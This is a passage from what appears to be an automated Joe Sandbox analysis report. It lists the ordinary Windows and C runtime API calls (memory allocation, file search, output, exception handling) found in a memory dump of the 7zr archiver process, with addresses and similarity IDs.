                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$free
                                          • String ID:
                                          • API String ID: 2654054672-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          Similarity
                                          • API ID: fputs
                                          • String ID:
                                          • API String ID: 1795875747-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CC80AF
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                            • Part of subcall function 00CBBDB5: __EH_prolog.LIBCMT ref: 00CBBDBA
                                          Similarity
                                          • API ID: H_prolog$ExceptionThrowmalloc
                                          • String ID:
                                          • API String ID: 3744649731-0
                                          APIs
                                          • FindClose.KERNELBASE(00000000,?,00C76880), ref: 00C76853
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          APIs
                                          Similarity
                                          • API ID: fputs
                                          • String ID:
                                          • API String ID: 1795875747-0
                                          APIs
                                          Similarity
                                          • API ID: memmove
                                          • String ID:
                                          • API String ID: 2162964266-0
                                          APIs
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000), ref: 00CF6B31
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          APIs
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          APIs
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CF6BAC
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          APIs
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          APIs
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0